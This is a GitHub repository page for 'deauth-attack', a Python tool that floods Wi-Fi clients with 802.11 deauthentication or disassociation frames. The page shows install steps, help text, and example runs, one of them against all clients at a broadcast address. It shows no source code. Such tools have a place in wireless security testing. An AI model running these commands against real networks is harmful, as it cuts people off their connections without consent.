Skip to content

mugichiya/deauth-attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

Deauth/Disas Attack (Python3)

2022/08/30([email protected])

Installation

# git clone https://github.com/verifsec/deauth-attack.git
# cd ./deauth-attack
# make

Usage

# deauth-attack -h
Deauth/Disas Attack 1.03 by <[email protected]>

usage: deauth-attack [-h] -i IFACE -b BSSID [-t TARGET] -m MODE

optional arguments:
  -h, --help            show this help message and exit
  -i IFACE, --iface IFACE
                        802.11 iface
  -b BSSID, --bssid BSSID
                        APUT MAC Address
  -t TARGET, --target TARGET
                        STAUT MAC Address
  -m MODE, --mode MODE  "disas" or "deauth"

Example

Safety

# deauth-attack -i wlan0mon -b 00:23:69:XX:XX:XX -m disas -t 34:97:f6:YY:YY:YY
Deauth/Disas Attack 1.02a by <[email protected]>

[+] Starting now ...
[|] Sending the disas flame from 00:23:69:XX:XX:XX to 34:97:f6:YY:YY:YY
[+] Finish. Hopefully it's nothing.

Unsafety

# deauth-attack -i wlan0mon -b 00:23:69:XX:XX:XX -m disas
Deauth/Disas Attack 1.02a by <[email protected]>

[+] Starting now ...
[|] Sending the disas flame from 00:23:69:XX:XX:XX to ff:ff:ff:ff:ff:ff
[+] Finish. Hopefully it's nothing.

License

This software includes the work that is distributed in the Apache License 2.0.

Remark

Don't Abuse.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •